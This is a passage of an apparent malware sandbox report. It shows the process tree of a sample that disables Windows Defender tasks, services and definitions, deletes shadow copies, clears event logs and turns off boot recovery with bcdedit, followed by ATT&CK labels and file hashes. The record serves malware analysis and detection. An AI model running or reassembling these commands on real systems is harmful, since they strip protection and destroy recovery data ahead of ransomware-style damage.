C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:3040
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:3320
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:696
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:896
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:712
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:3956
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:804
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1216
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:2296
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:3652
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3628
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2288
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2008
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3100
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3776
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:520
-
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1392
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵PID:1852
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:920
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1496
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3788
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1132
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:3456
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:2364
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2452
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:612
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1220
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4016
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2332
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1136
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
8592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
MD5
0fbf5bfa22c1470876b69db50a2b6a49
SHA1cddb8978f8f2dbe428099a5ff0daa4f73c9444a6
SHA2563a00db9d8e9c7551dd3737605f84bdbd0bb3083e2e23b12cc8e3995d6cfc7690
SHA5120e49eb698ba925a880ca63e0c4450f38c0dc4474a45928269474578684d79e1c750b9596a29a1d289ad2867716b79216ff26b862ad4de1ff04aea17fdb9b52fa